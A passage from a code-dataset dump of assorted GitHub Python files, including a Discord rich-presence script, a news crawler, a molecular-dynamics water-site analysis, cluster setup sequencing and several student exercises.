y.split(\":title\")\n\t\t\t\t\tsongName = title[1].replace(\" \"*15, \"\") + \" \"*2\n\n\t\telif \"Stopped\" in getplaying:\n\t\t\tisplaying = \"Stopped\"\n\n\t\telif \"Paused\" in getplaying:\n\t\t\tisplaying = \"Paused\"\n\t\t\tfor x in linesplit:\n\t\t\t\tif \":artist\" in x:\n\t\t\t\t\tartist = x.split(\":artist\")\n\t\t\t\t\tsongArtist = artist[1].replace(\" \"*14, \"\") + \" \"*2\n\n\t\t\tfor y in linesplit:\n\t\t\t\tif \":title\" in y:\n\t\t\t\t\ttitle = y.split(\":title\")\n\t\t\t\t\tsongName = title[1].replace(\" \"*15, \"\") + \" \"*2\n\n\t\telse:\n\t\t\tisplaying = \"Stopped\"\n\t\t\tsongArtist = \"\"\n\t\t\tsongName = \"\"\n\n\t\tif not all((songName, songArtist)):\n\t\t\t_raw = os.popen(\"playerctl metadata\").read().splitlines()\n\t\t\tfor line in _raw:\n\t\t\t\tif \":url\" in line:\n\t\t\t\t\traw_url = line.split(\":url\")\n\t\t\t\t\turl = raw_url[1].replace(\" \"*17, \"\") + \" \"*2\n\t\t\t\t\turl = unquote(url)\n\n\t\t\t\t\trsn = url.split('/')[-1]\n\t\t\t\t\tisplaying = \"Playing\"\n\t\t\t\t\tsongArtist = \"\"\n\t\t\t\t\tsongName = rsn\n\t\t\t\t\tsongYtsearch = searchOnYoutube(songName, \"*\")\n\n\t\telse:\n\t\t\tsongYtsearch = searchOnYoutube(songName, songArtist)\n\n\n\n\t\treturn {\"isplaying\": isplaying, \"songName\": songName,\n\t\t\t\t\"songArtist\": songArtist, \"youtubeSearch\": songYtsearch}\n\n\t@staticmethod\n\tdef hasChanded():\n\t\tglobal past_buf\n\t\tglobal curr_buf\n\n\t\tif curr_buf == past_buf:\n\t\t\treturn False\n\n\t\tpast_buf = curr_buf\n\t\treturn True\n\n\t@staticmethod\n\tdef updateSong():\n\n\t\tif past_buf is None:\n\t\t\treturn\n\n\t\tsinfo = past_buf\n\n\t\tss = sinfo['isplaying']\n\t\tsn = sinfo['songName']\n\t\tsa = sinfo['songArtist']\n\t\tsu = sinfo['youtubeSearch']\n\n\t\t# Buttons\n\t\trpbuttons = [{\n\t\t\t\t'label': \"Search On Youtube\",\n\t\t\t\t'url': su\n\t\t\t}\n\t\t]\n\n\t\tproject_github_button = {\n\t\t\t\t'label': \"Aprich Project\",\n\t\t\t\t'url': 'https://github.com/hayukimori/aprich'\n\t\t\t}\n\n\n\n\t\tif ENABLE_PROJECT_GITHUB_BUTTON:\n\t\t\trpbuttons.append(project_github_button)\n\n\n\t\twhile Discord.update(sa, sn, IMAGE, ss, sa, buttons=rpbuttons, err_h=ErrHandler.couldNotUpdate):\n\t\t\ttime.sleep(DELAY)\n\n\t\tDisplay.status(ss, sn, sa)\n\n\t@staticmethod\n\tdef firstTime(err_h=lambda err: None):\n\t\tglobal rpc\n\t\tglobal curr_buf\n\n\t\ttry:\n\t\t\trpc = pypresence.Presence(ID)\n\t\t\tcurr_buf = Controllers.getSong()\n\t\t\tControllers.updateSong()\n\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\n\t\telse:\n\t\t\tDisplay.log(\"rich presence connected with discord\")\n\n\t@staticmethod\n\tdef eventLoop():\n\t\tglobal curr_buf\n\n\t\twhile True:\n\t\t\tcurr_buf = Controllers.getSong()\n\n\t\t\tif Controllers.hasChanded():\n\t\t\t\tControllers.updateSong()\n\n\t\t\ttime.sleep(DELAY)\n\n\ndef main():\n\tglobal ENABLE_PROJECT_GITHUB_BUTTON\n\tglobal IMAGE\n\n\t# Define default args based on cli args;\n\tnewvars = UserOptions.get_args()\n\tENABLE_PROJECT_GITHUB_BUTTON = newvars.enable_github_button\n\tIMAGE = newvars.image\n\t\n\ttry:\n\t\twhile Controllers.firstTime(ErrHandler.couldNotConnect):\n\t\t\ttime.sleep(DELAY)\n\t\tControllers.eventLoop()\n\n\texcept KeyboardInterrupt as err:\n\t\tDisplay.err(\"interruped by user\", type(err))\n\t\trpc.close()\n\n\nif __name__ == 
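# --- editor's aside (sketch, not part of the original record) ---
# The replace(" "*14, "") calls above depend on playerctl's exact column
# padding. Splitting on the first two runs of whitespace is less
# fragile; parse_metadata is a hypothetical helper, and the
# "player key value" sample layout is an assumption about playerctl
# output, not a guarantee.
def parse_metadata(raw):
    meta = {}
    for line in raw.splitlines():
        parts = line.split(None, 2)  # player, key, value
        if len(parts) == 3:
            meta[parts[1]] = parts[2]
    return meta

sample = "spotify xesam:title   Some Song\nspotify xesam:artist  Some Artist"
assert parse_metadata(sample)["xesam:title"] == "Some Song"
# --- end aside ---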
\"__main__\":\n\tmain()\n","repo_name":"hayukimori/aprich","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28191322959","text":"#!/bin/python3\n\nimport os\nimport sys\n\nclass SinglyLinkedListNode:\n def __init__(self, node_data):\n self.data = node_data\n self.next = None\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def insert_node(self, node_data):\n node = SinglyLinkedListNode(node_data)\n\n if not self.head:\n self.head = node\n else:\n self.tail.next = node\n\n\n self.tail = node\n\ndef compare_lists(llist1, llist2):\n curr1 = llist1\n curr2 = llist2\n\n same = True\n\n while (curr1 and curr2):\n if curr1.data != curr2.data:\n same = False\n break\n curr1 = curr1.next\n curr2 = curr2.next\n\n if ((curr1 and not curr2) or (curr2 and not curr1)):\n same = False\n\n return same\n\ndef main():\n node1 = SinglyLinkedListNode(1)\n node2 = SinglyLinkedListNode(2)\n\n node3 = SinglyLinkedListNode(1)\n node4 = SinglyLinkedListNode(2)\n\n node1.next = node2\n node3.next = node4\n\n print (compare_lists(node1, node3))\n\nif __name__ == \"__main__\":\n main()","repo_name":"ymwondimu/HackerRank","sub_path":"Subset_DataStructures/compare_linked_list.py","file_name":"compare_linked_list.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39564180365","text":"# -*- coding: utf-8 -*-\r\n'''\r\nstep01_newsCrawling\r\n\r\n1. news Crawling\r\n url : http://media.daum.net\r\n2. pickle save\r\n binary file save\r\n'''\r\nimport urllib.request as req # url 요청\r\nfrom bs4 import BeautifulSoup # html 파싱\r\nimport pickle\r\n\r\n\r\n# 1. 
url = 'http://media.daum.net'\r\nurl = 'http://media.daum.net'\r\n\r\n# 1-1) url 요청\r\nres = req.urlopen(url)\r\nsrc = res.read() # source\r\nprint(src) # 한글깨짐현상\r\n\r\n# 1-2) html 파싱\r\nsrc = src.decode('utf-8') # 디코딩 <한글깨짐현상을 막아줌>\r\nhtml = BeautifulSoup(src, 'html.parser') # < html문서로 변경>\r\nprint(html) # 한글출력\r\n\r\n# 1-3) tag[속성='값'] -> \"a[class='link_txt']\"\r\nlinks = html.select(\"a[class='link_txt']\")\r\nprint(len(links)) # 62\r\nprint(links)\r\n\r\n# 1-4) 기사 내용만 추출\r\ncrawling_data = [] # 빈 list\r\nfor link in links:\r\n link_str = str(link.string) # 내용만 추출후 문자타입으로 변경\r\n crawling_data.append(link_str.strip()) # 문장끝 불용어 처리(\\n, 공백) , 빈 list에 삽입\r\nprint(crawling_data)\r\nprint(len(crawling_data)) # 62개 문장\r\n\r\n\r\n# 1-5) pickle file save\r\nfile = open(\"../data/new_crawling.pickle\", mode='wb')\r\npickle.dump(crawling_data, file)\r\nprint('pickle file saved')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/4_Python-II2","sub_path":"chap07_TextMining/lecture01_Crawling/step01_newsCrawling.py","file_name":"step01_newsCrawling.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23150174281","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('website.views',\n url(r'^$', 'home',name='home'),\n url(r'^$', 'sign_out',name='sign_out'),\n url(r'^$', 'sign_in',name='sign_in'),\n url(r'^$', 'register',name='register'),\n url(r'^contact_us$', 'contact_us', name='contact_us'),\n url(r'^members$','members',name='members'),\n url(r'^life$','life',name='life'),\n url(r'^devel$','devel', name='devel'),\n url(r'^summer$','summer', name='summer'),\n)\n\n","repo_name":"ogu2/MIT-dh-website","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1521756","text":"# The code for the manuscript: \n# LAWS: Local Alignment for Water Sites - tracking ordered water in simulations\n# Authors: Eugene Klyshko, Justin Kim, and Sarah Rauscher\n# References in the code are related to the main text of the manuscript\n# \n# Developer: Eugene Klyshko\n\n# This code generates bulk water sites (> 6 A from the protein) and computes offset vectors from the nearest water molecules to each bulk water site\n# in each frame of the MD simulation\n\n## (!) User should adjust these parameters according to their system and file names (1-2):\n\n# 1. Path to a simulation structure and trajectory (which includes positions of all water molecules)\ntraj_folder = './'\nstruct = traj_folder + 'firstframe.gro'\ntrajectory = traj_folder + 'trajectory.xtc'\n\n# 2. Parameters of the system and trajectory\nstride = 10 # Stride for analysis (when stride=10 we will analyze only every 10-th frame of the original trajectory)\nN_chains = 4 # Number of symmetric chains in the simulation. In the manuscript, we have a unit cell with 4 protein chains. 
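# --- editor's aside (sketch, not part of the original record) ---
# find_chains is imported from the project's laws module; a plausible
# minimal version (an assumption, not the package's actual code) just
# builds consecutive per-chain atom index ranges:
def find_chains_sketch(n_chains, n_atoms_in_chain):
    return [range(i * n_atoms_in_chain, (i + 1) * n_atoms_in_chain)
            for i in range(n_chains)]

assert list(find_chains_sketch(2, 3)[1]) == [3, 4, 5]
# --- end aside ---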
\nN_atoms_in_chain = 1473 # Number of protein atoms in each chain.\nn_waters = 120 # Number of bulk water sites to generate\n\n# import useful libraries, such as MDAnalysis, and necessary functions\nimport MDAnalysis as md\nimport numpy as np\nimport sys\nfrom MDAnalysis.analysis import align\nfrom MDAnalysis.analysis.distances import distance_array\nfrom MDAnalysis.lib.distances import apply_PBC, augment_coordinates\n\n# import function necessary for analysis of a simulation\nfrom laws import (\n find_chains,\n find_offsets\n)\n\n# This function assumes that atomic coordinates are written consequtively (chain by chain) in the structure file from the very beginning of the file.\n# It creates MDAnalysis selection for each chain (can be applied to both CRYSTAL_STRUCTURE and MD struct) for further analysis\nif N_chains >= 1:\n chains = find_chains(N_chains, N_atoms_in_chain)\n\n# Loading the system into MDAnalysis universe:\ntraj = md.Universe(struct, trajectory)\nprint(\"Information about trajectory\", trajectory)\nframes = len(traj.trajectory) # Determine number of frames in the trajectory\ntimesteps = len(range(0, frames, stride)) - 1 # Determine number of frames to be used in analysis, including only every stride-th frame\n\n# memory allocation for offset vectors, distances (magnitudes of offset vectors)\ndistances = np.empty((timesteps, n_waters), dtype=np.float)\noffsets = np.empty((timesteps, n_waters, 3), dtype=np.float)\n\n## Pipeline: \nall_waters = traj.select_atoms('name OW') # selecting all water oxygens\nprotein_atoms = traj.select_atoms('protein') # selecting all protein atoms\n\n# Bulk water sites are generated as the positions at least 6 A from the protein. \n# A nice quick trick - to do it with MDAnalysis: (i) choose water molecules which are more than 6 A from the protein (in the first frame), \n# and (ii) use their positions (in the first frame) as bulk water sites. \n# Note (!) make sure there are more of such waters than your desired number in n_waters. 
Selecting the first n_waters and their coordinates:\nbulk_water_sites = traj.select_atoms('name OW and not around 6.0 (protein and not type H)').atoms[:n_waters].positions.copy()\n\n# Looping over all time frames\nfor t, ts in enumerate(traj.trajectory[0:frames:stride]):\n \n # Computing distances to the closest water taking into account preiodic images\n box = ts.dimensions # box dimensions for treating periodic boundary conditions\n dist_mtx = distance_array(\n bulk_water_sites,\n all_waters.atoms.positions,\n box=box,\n backend='OpenMP'\n )\n distances[t] = np.min(dist_mtx, axis=1)\n \n # Finding offset vectors to the closest water taking into account preiodic images\n nearest_water_indeces = np.argmin(dist_mtx, axis=1)\n nearest_water_positions = all_waters.atoms[nearest_water_indeces].positions\n offsets[t] = find_offsets(\n nearest_water_positions,\n bulk_water_sites.astype(np.float32),\n dist_mtx,\n box\n )\n \n # printing progress\n if t % 10 == 0:\n print(\"Timestep: {} out of {}\".format(t, timesteps))\n\n# filename to save all the results in npy array\nfilename_to_save = 'bulk'\nnp.save(filename_to_save + '_offsets', offsets) # Offset vectors r, shape (chains, frames, 3)\nnp.save(filename_to_save + '_distances', distances) # Magnitudes of offset vectors, shape (chains, frames, 1)\n","repo_name":"rauscher-lab/LAWS","sub_path":"compute_bulk_r.py","file_name":"compute_bulk_r.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"72557017833","text":"def addToInventory(inventory, addedItems):\n for item in addedItems:\n inventory.setdefault(item, 0)\n inventory[item] += 1\n return inventory\n\ndef displayInventory(inventory):\n print('Inventory:')\n for k, v in inventory.items():\n print(str(v).rjust(2,' '), k)\n\nif __name__ == '__main__':\n inv = {'gold coin': 42, 'rope': 1}\n dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\n inv = addToInventory(inv, dragonLoot)\n displayInventory(inv)\n\n import sys\n sys.exit(0)","repo_name":"HeroIsNothing/Practice","sub_path":"python/python-automate-work/ch05-dict/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17902196700","text":"import time\nimport argparse\n\nimport access\nimport command\nimport deploy\nimport infra\nimport setup\nimport configuration\nimport verify\n\n\ndef sequence_keysystem(ops: setup.Operations) -> None:\n ops.add_subcommand(setup.setup_keyserver)\n ops.add_operation(\"verify that keyserver static files can be fetched\",\n iterative_verifier(verify.check_keystatics, 10.0))\n ops.add_subcommand(setup.admit_keyserver)\n if configuration.get_config().is_kerberos_enabled():\n ops.add_subcommand(setup.setup_keygateway)\n ops.add_operation(\"verify that the keygateway is responsive\", verify.check_keygateway)\n else:\n ops.add_operation(\"skip keygateway enablement (kerberos is disabled)\", lambda: None)\n\n\ndef sequence_ssh(ops: setup.Operations) -> None:\n ops.add_operation(\"request SSH access to cluster\", access.access_ssh_with_add)\n ops.add_subcommand(setup.setup_supervisor_ssh)\n ops.add_operation(\"verify ssh access to supervisor\", iterative_verifier(verify.check_ssh_with_certs, 20.0))\n\n\ndef sequence_supervisor(ops: setup.Operations) -> None:\n config = configuration.get_config()\n ops.add_subcommand(sequence_keysystem)\n ops.add_operation(\"verify that 
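# --- editor's aside (sketch, not part of the original record) ---
# find_offsets also comes from the laws module; conceptually it returns
# the minimum-image displacement from each site to its nearest water.
# A plain-numpy sketch for an orthorhombic box (an assumption about the
# package's behaviour, not its actual code):
import numpy as np

def min_image_offsets(positions, sites, box_lengths):
    d = positions - sites  # raw displacement vectors, shape (n, 3)
    return d - box_lengths * np.round(d / box_lengths)

box = np.array([10.0, 10.0, 10.0])
off = min_image_offsets(np.array([[9.5, 0.0, 0.0]]),
                        np.array([[0.5, 0.0, 0.0]]), box)
assert np.allclose(off, [[-1.0, 0.0, 0.0]])
# --- end aside ---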
keysystem certs are available on supervisor\", iterative_verifier(verify.check_certs_on_supervisor, 20.0))\n ops.add_subcommand(setup.setup_prometheus)\n ops.add_subcommand(sequence_ssh)\n ops.add_subcommand(setup.setup_bootstrap_registry)\n ops.add_subcommand(setup.update_registry)\n\n ops.add_operation(\"pre-deploy flannel\", deploy.launch_flannel)\n ops.add_operation(\"pre-deploy dns-addon\", deploy.launch_dns_addon)\n ops.add_operation(\"pre-deploy flannel-monitor\", deploy.launch_flannel_monitor)\n ops.add_operation(\"pre-deploy dns-monitor\", deploy.launch_dns_monitor)\n\n if config.user_grant_domain != '':\n ops.add_operation(\"pre-deploy user-grant\", deploy.launch_user_grant)\n\n # TODO: have a way to do this without a specialized just-for-supervisor method\n ops.add_subcommand(infra.infra_sync_supervisor)\n\n\ndef iterative_verifier(verifier, max_time, pause=2.0):\n def ver():\n end_time = time.time() + max_time\n while True:\n try:\n verifier()\n return\n except Exception as e:\n if time.time() >= end_time:\n raise e\n print(\"Verification failed:\", e)\n print(\"RETRYING...\")\n time.sleep(pause)\n\n command.provide_command_for_function(ver, command.get_command_for_function(verifier))\n ver.dispatch_get_name = lambda default: command.get_command_for_function(verifier)\n\n return ver\n\n\ndef sequence_cluster(ops: setup.Operations) -> None:\n ops.add_operation(\"verify that the fundamental cluster infrastructure is online\",\n iterative_verifier(verify.check_online, 120.0))\n\n ops.add_operation(\"verify that etcd has launched successfully\",\n iterative_verifier(verify.check_etcd_health, 120.0))\n ops.add_operation(\"verify that kubernetes has launched successfully\",\n iterative_verifier(verify.check_kube_health, 120.0))\n\n ops.add_operation(\"verify that containers can be pulled from the registry\", iterative_verifier(verify.check_pull, 60.0))\n ops.add_operation(\"verify that flannel is online\", iterative_verifier(verify.check_flannel, 210.0))\n ops.add_operation(\"verify that dns-addon is online\", iterative_verifier(verify.check_dns, 120.0))\n\n\ndef add_dry_run_argument(parser: argparse.ArgumentParser, dest: str):\n parser.add_argument(\"--dry-run\", dest=dest, action=\"store_true\", help=\"show command sequence performed by command without actually running them\")\n\n\ndef wrapseq(desc: str, f):\n def wrap_param_tx(opts):\n ops = setup.Operations()\n\n def invoke():\n dry_run = opts.get('dry_run', False)\n dry_run_outer = opts.get('dry_run_outer', False)\n if dry_run or dry_run_outer:\n ops.print_annotations()\n else:\n ops.run_operations()\n\n new_opts = {'ops': ops, **opts}\n\n return new_opts, invoke\n\n desc, inner_configure = command.wrap(desc, f, wrap_param_tx)\n\n def configure(command: list, parser: argparse.ArgumentParser):\n add_dry_run_argument(parser, \"dry_run\")\n inner_configure(command, parser)\n\n return desc, configure\n\n\ndef seq_mux_map(desc, mapping):\n desc, inner_configure = command.mux_map(desc, mapping)\n\n def configure(command: list, parser: argparse.ArgumentParser):\n # allow --dry-run to be present before selector and also have it appear in the help message\n add_dry_run_argument(parser, \"dry_run_outer\")\n inner_configure(command, parser)\n\n return desc, configure\n\n\nmain_command = seq_mux_map(\"commands about running large sequences of cluster bring-up automatically\", {\n \"keysystem\": wrapseq(\"set up and verify functionality of the keyserver and keygateway\", sequence_keysystem),\n \"ssh\": wrapseq(\"set up and verify ssh access 
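# --- editor's aside (sketch, not part of the original record) ---
# iterative_verifier above is a retry-until-deadline wrapper; the same
# pattern stripped of the command bookkeeping (retry_until is a
# hypothetical name):
import time

def retry_until(check, max_time, pause=2.0):
    """Call check() until it stops raising or max_time seconds elapse."""
    deadline = time.time() + max_time
    while True:
        try:
            return check()
        except Exception:
            if time.time() >= deadline:
                raise
            time.sleep(pause)
# --- end aside ---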
to the supervisor node\", sequence_ssh),\n \"supervisor\": wrapseq(\"set up and verify functionality of entire supervisor node (keysystem + ssh)\",\n sequence_supervisor),\n \"cluster\": wrapseq(\"set up and verify kubernetes infrastructure operation\", sequence_cluster),\n})\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source/2948.py","file_name":"2948.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16569772354","text":"#lab 08\n'''\nf=[]\nl=input(\"enter a number to define the length of the string: \")\nif((isinstance(l,int))):\n for i in range(l):\n f.append(str(input(\"enter a number to add to the list: \")))\n print(f)\n#else:\n# l=input(\"you did not enter a number\\nplease enter a number to define the length of the string: \")\n\n\n\n'''\nfb=[1,2,3,5,8,13]\nboolean=\"True\"\n\nfor i in range(2,len(fb)):\n print(str(fb[i]) + \",\" + str(fb[i-1]) + \",\" +str(fb[i-2]))\n if fb[i]==(fb[i-1]+fb[i-2]):\n continue\n else:\n boolean=\"False\"\n break\n\nif boolean==\"True\":\n print(\"FIBO!!!!\")\nelse:\n print(\"NOT FIBO\")\n\n\n#while(True):\n#i=input(\"enter first #:\\n\")","repo_name":"hweber01/DEVOPS","sub_path":"LESSON 01/LAB08.py","file_name":"LAB08.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15230593519","text":"#!~/usr/bin/python3.2\n\nimport copy\n\nfilename = 'D-large.in'\n\nFILE = open(filename)\nT = int(FILE.readline())\n\ndef solve(keys,chests, order):\n for i,chest in enumerate(chests):\n available_moves = set([key for key in keys if keys[key] > 0])\n if chest['req'] in available_moves:\n newKeys = copy.copy(keys)\n newKeys[chest['req']] -= 1\n for key in chest['con']: newKeys[key] += 1\n\n newChests = chests[:i] + chests[i+1:]\n newOrder = copy.copy(order)\n newOrder.append(chest['ix'])\n\n if len(newChests) == 0: return str(newOrder)\n\n if solvable(newKeys,newChests):\n temp = solve(newKeys,newChests,newOrder)\n if (temp != 'IMPOSSIBLE'): return temp\n\n return 'IMPOSSIBLE'\n\ndef solvable(keys,chests):\n #If we cheat, can we win?\n for chest in chests: chest['flag'] = 0\n\n keySet = set([key for key in keys if keys[key] >= 1])\n if len(keySet) < 1: return False\n\n flag = 1 #something occurring\n while flag:\n flag = 0\n for chest in chests:\n if (chest['req'] in keySet) and (chest['flag'] == 0):\n flag = 1\n chest['flag'] = 1\n keySet = keySet.union(set(chest['con']))\n\n for chest in chests:\n if chest['flag'] == 0: return False\n\n #Is the final state positive for all keys?\n num = copy.copy(keys)\n\n for chest in chests:\n num[chest['req']] -= 1\n for k in chest['con']:\n num[k] += 1\n\n for i in num:\n if num[i] < 0: return False\n\n return True\n\nfor t in range(1,T+1):\n k,n = [int(x) for x in FILE.readline().split(' ')]\n keys = {i:0 for i in range(1,201)}\n for key in [int(x) for x in FILE.readline().split(' ')]: keys[key] += 1\n\n chests = []\n for i in range(0,n):\n raw = FILE.readline().split(' ')\n chests.append( { 'req':int(raw[0]), 'con':[int(x) for x in raw[2:]], 'ix':i+1 } )\n\n\n if solvable(keys,chests):\n sol = solve(keys,chests,[])\n if sol != 'IMPOSSIBLE':\n sol = str(sol)[1:-1].split(', ')\n sol = ' '.join(sol)\n else:\n sol = 'IMPOSSIBLE'\n print('Case #' + str(t) + ': ' + sol)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source 
Codes/CodeJamData/13/04/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"36313673137","text":"import datetime\nimport logging\n\nimport config\nimport docs\nimport models\n\nfrom google.appengine.ext.deferred import defer\nfrom google.appengine.ext import ndb\n\n\ndef intClamp(v, low, high):\n \"\"\"Clamps a value to the integer range [low, high] (inclusive).\n\n Args:\n v: Number to be clamped.\n low: Lower bound.\n high: Upper bound.\n\n Returns:\n An integer closest to v in the range [low, high].\n \"\"\"\n return max(int(low), min(int(v), int(high)))\n\n\ndef updateAverageRating(review_key):\n \"\"\"Helper function for updating the average rating of a product when new\n review(s) are added.\"\"\"\n\n def _tx():\n review = review_key.get()\n v = review.video_key.get()\n if not review.rating_added:\n review.rating_added = True\n v.num_reviews += 1\n v.avg_rating = (v.avg_rating +\n (review.rating - v.avg_rating) / float(v.num_reviews))\n # signal that we need to reindex the doc with the new ratings info.\n v.needs_review_reindex = True\n ndb.put_multi([v, review])\n # We need to update the ratings associated document at some point as well.\n # If the app is configured to have BATCH_RATINGS_UPDATE set to True, don't\n # do this re-indexing now. (Instead, all the out-of-date documents can be\n # be later handled in batch -- see cron.yaml). If BATCH_RATINGS_UPDATE is\n # False, go ahead and reindex now in a transational task.\n if not config.BATCH_RATINGS_UPDATE:\n defer(\n models.Video.updateVideoDocWithNewRating,\n v.key.id(),\n _transactional=True)\n return (v, review)\n\n try:\n # use an XG transaction in order to update both entities at once\n ndb.transaction(_tx, xg=True)\n except AttributeError:\n # swallow this error and log it; it's not recoverable.\n logging.exception('The function updateAverageRating failed. Either review '\n + 'or product entity does not exist.')\n\n\ndef dateFromDateString(date_string):\n if not date_string or date_string.strip() == '-':\n return ''\n timedate_formats = ['%Y-%m-%dT%H:%M:%S.%fZ', '%Y-%m-%d %H:%M:%S', '%m/%d/%Y %H:%M:%S']\n result = None\n for f in timedate_formats:\n try:\n result = datetime.datetime.strptime(date_string, f)\n break\n except ValueError:\n continue\n if not result:\n raise ValueError('Unexpected timedate format! 
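# --- editor's aside (sketch, not part of the original record) ---
# updateAverageRating above uses the running-mean identity
# new_avg = old_avg + (x - old_avg) / new_count, which avoids re-reading
# every stored review. A quick numeric check of the identity:
ratings = [4, 5, 3, 5]
avg, n = 0.0, 0
for x in ratings:
    n += 1
    avg = avg + (x - avg) / n
assert abs(avg - sum(ratings) / len(ratings)) < 1e-12
# --- end aside ---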
(%s)' % date_string)\n return result\n","repo_name":"miketruty/public","sub_path":"py/cloud_next_library/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12071713246","text":"def csvwrite(path, vottotal):\n import csv\n import platform # importamos las funciones nescesarias\n import modulos.checkdatos as datos\n\n header = [\"DNI, REGION, CARGO, PARTIDO\"] # definimos un header y un fin para el csv\n fin = [\"FIN\"]\n\n rows, error = datos.vervoto(vottotal, path) # Llamamos la funcion vervoto de checkdatos.py\n\n if platform.system() == 'Windows':\n csvfile = path + \"\\csv\\\\votos.csv\"\n elif platform.system() == 'Linux': # fix de carpeta para compatibilidad con linux y windows\n csvfile = path + '/csv/votos.csv'\n \n with open (csvfile, \"w\") as votos: # Escribimos el csv\n writer = csv.writer(votos)\n writer.writerow(header) \n writer.writerows(rows)\n writer.writerow(fin)\n return error","repo_name":"marcosvillar4/Etapa-2-","sub_path":"modulos/votacionwrite.py","file_name":"votacionwrite.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27605857912","text":"# -*- coding: utf-8 -*-#\r\n# Author: Liangliang\r\n# Date: 2019\\4\\1 0001 20:46:46\r\n# File: LKPE.py\r\n# Software: PyCharm\r\n#------------------------------------\r\n\r\nimport numpy as np\r\nimport math\r\n\r\ndef LKPE(data, m):\r\n '''\r\n\tElbagoury A, Ibrahim R, Kamel M S, et al. EBEK: Exemplar-Based Kernel Preserving Embedding[C]//IJCAI. 2016: 1441-1447.主要完成的是降维操作\r\n data:输入的数据,每一行代表一个样本,每一列代表一个特征 n*d\r\n m: 降维后数据的维数\r\n '''\r\n epsilon = 0.64 #原文算法2中epsilon参数\r\n n = data.shape[0] #数据的样本数\r\n d = data.shape[1] #数据的维数\r\n A = data.transpose() #将输入的数据进行转置,与文中的参数的形式保持一致\r\n U, Sigma, V = np.linalg.svd(A) #对A进行奇异值分解\r\n if len(Sigma)>=m:\r\n Sigma = np.diag(Sigma[0:m])\r\n else:\r\n Sigma = np.diag(Sigma,m)\r\n #选择出m个独立的样本\r\n E = [0] #用于记录选择出来的列\r\n size = 0\r\n for i in range(1,min(m,n)):\r\n ai = A[:,[i]]\r\n for j in range(0,size):\r\n aj = A[:,[E[j]]]\r\n ai = ai - sum(ai*aj)/sum((aj*aj)*aj)\r\n if np.linalg.norm(ai,1)!=0:\r\n for ii in range(len(E)):\r\n if np.dot(A[:,ii],A[:,[i]]) <= epsilon:\r\n size = size + 1\r\n E.append(i)\r\n break\r\n if len(E) 0:\n if(x[y-1] == 'c'):\n print(x[y-1])\n y-=1\n break;\n\ni =0;\nx = ['a','c']\nwhile i < len(x):\n if(x[i] == 'c'):\n print(x[i])\n i+=1\n \n \n\n\n# In[3]:\n\nlist = [1,2,3,43] \nfor i in list:\n print(i)\n\n\n# In[4]:\n\niterator = iter(list)\nnext(iterator)\n\n\n# In[8]:\n\nnext(iterator)\n\n\n# In[9]:\n\nlist = ['abc', 'def','ghi']\nstrIterator = iter(list)\nnext(strIterator)\n\n\n# In[ ]:\n\n\n\n","repo_name":"sasidhar20/python","sub_path":"Iterator.py","file_name":"Iterator.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32927721538","text":"#!/usr/bin/env python3\n\n\"\"\"\nPlenum-Reminder, by Kunsi\n\nTo be executed by a cronjob every day at 00:01\nChecks wether a Plenum is scheduled for the next day, if yes, it\nsends out a mail notification to the intern mailing list.\n\"\"\"\n\nfrom datetime import date, timedelta\nfrom locale import setlocale, LC_ALL\nfrom os import environ\nfrom sys import argv, exit\n\nfrom email.mime.text import MIMEText\nfrom requests import get\nfrom smtplib import SMTP\n\nURL = 
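# --- editor's aside (sketch, not part of the original record) ---
# The LKPE routine above takes the SVD of the transposed data matrix to
# reduce d features to m. The projection step on its own, with made-up
# data (a sketch of the idea, not the paper's full algorithm):
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 10))  # n samples, d features
m = 3
U, s, Vt = np.linalg.svd(X.T, full_matrices=False)
X_reduced = X @ U[:, :m]  # project onto the top-m left singular vectors
assert X_reduced.shape == (100, 3)
# --- end aside ---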
